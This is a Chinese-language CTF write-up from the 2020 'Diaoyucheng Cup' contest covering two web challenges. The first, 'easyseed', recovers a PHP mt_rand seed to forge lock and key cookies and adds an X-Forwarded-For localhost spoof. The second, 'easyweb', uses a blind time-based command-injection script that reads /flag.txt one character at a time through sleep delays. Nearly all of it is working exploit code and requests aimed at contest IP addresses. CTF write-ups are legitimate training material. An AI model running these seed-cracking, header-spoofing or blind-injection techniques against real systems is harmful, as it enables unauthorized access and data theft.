2020-08-28
361
“钓鱼城杯”国际网络安全技能大赛Writeup
easyseed
index.bak:
1 2 3 4 5 6 7 8 9 10 $lock = random(6 , 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ' ); $key = random(16 , '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ' ); function random ($length, $chars = '0123456789ABC' ) $hash = '' ; $max = strlen($chars) - 1 ; for ($i = 0 ; $i < $length; $i++) { $hash .= $chars[mt_rand(0 , $max)]; } return $hash; }
使用php_mt_rand随机数种子爆破。
1 2 3 4 5 6 7 8 9 10 11 str1 = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ' str2 = 'vEUHaY' str3 = str1[::-1 ] length = len(str2) res = '' for i in range(len(str2)): for j in range(len(str1)): if str2[i] == str1[j]: res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1 ) + ' ' break print(res)
爆破seed
再生成key值
1 2 3 4 5 6 7 8 9 10 11 12 13 mt_srand('718225' ); $lock = random(6 , 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ' ); $key = random(16 , '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ' ); echo $lock.PHP_EOL;echo $key;function random ($length, $chars = '0123456789ABC' ) $hash = '' ; $max = strlen($chars) - 1 ; for ($i = 0 ; $i < $length; $i++) { $hash .= $chars[mt_rand(0 , $max)]; } return $hash; }
发送payload:
1 2 3 4 5 6 7 8 9 10 11 import requestsurl = '''http://122.112.252.28:20001/''' cookies = { 'key' : 'nRtqGR8mtd9ZOPyI' , 'lock' : 'vEUHaY' } headers = { 'X-Forwarded-For' : '127.0.0.1' } res = requests.get(url=url, cookies=cookies, headers=headers) print(res.text)
easyweb
抓包
然后无回显命令执行,然后盲注一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 import requestsfrom time import timeurl = 'http://119.3.37.185/' payload = 'if [ `cut -c {num1} /flag.txt` = "{num2}" ];then sleep 2;fi' flag = '' for i in range(400 ): for j in range(32 ,127 ): data = { 'cmd' :payload.format(num1=str(i),num2=chr(j)) } start_time = time() requests.post(url,data=data) if time()-start_time>2 : flag += chr(j) print(flag) if chr(j) == '}' : exit()
